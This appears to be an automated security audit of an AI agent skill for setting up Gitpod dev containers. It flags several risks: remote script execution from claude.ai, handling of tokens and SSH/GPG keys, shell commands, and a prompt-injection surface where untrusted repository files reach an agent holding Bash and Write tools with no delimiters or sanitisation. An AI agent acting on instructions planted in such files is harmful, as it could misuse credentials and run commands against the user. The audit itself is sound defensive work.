setup-devcontainer
Fail
Audited by Gen Agent Trust Hub on Apr 22, 2026
Risk Level: HIGHREMOTE_CODE_EXECUTIONCREDENTIALS_UNSAFEPROMPT_INJECTIONCOMMAND_EXECUTION
Full Analysis
- [REMOTE_CODE_EXECUTION]: Fetches and executes an installation script from Claude.ai's official domain (
https://claude.ai/install.sh) to set up development tooling within the environment. This operation facilitates the automated installation of the Claude Code CLI. - [CREDENTIALS_UNSAFE]: The skill facilitates the management of sensitive credentials including
CLAUDE_CODE_OAUTH_TOKEN,GH_TOKEN, SSH private keys, and GPG keyrings. It includes instructions for users to provide these tokens or configure them via an external web dashboard, avoiding hardcoding but maintaining a high-risk data surface. - [PROMPT_INJECTION]:
- Ingestion points: Reads and parses repository configuration files including
package.json,Gemfile,composer.json, and.gitpod.yml(SKILL.md) to detect frameworks and services. - Boundary markers: Absent; the skill does not specify the use of delimiters when processing untrusted file content.
- Capability inventory: Accesses high-privilege tools such as
Bashfor environment management andWritefor generating project configuration files. - Sanitization: Absent; there is no explicit instruction for the sanitization of framework metadata before its use in shell commands or configuration generation.
- [COMMAND_EXECUTION]: Performs shell operations using the
gitpodCLI for project initialization and utilizes SSH to execute verification commands inside newly created environments, allowing for the execution of framework-specific lifecycle commands.
Recommendations
- HIGH: Downloads and executes remote code from: https://claude.ai/install.sh - DO NOT USE without thorough review
Audit Metadata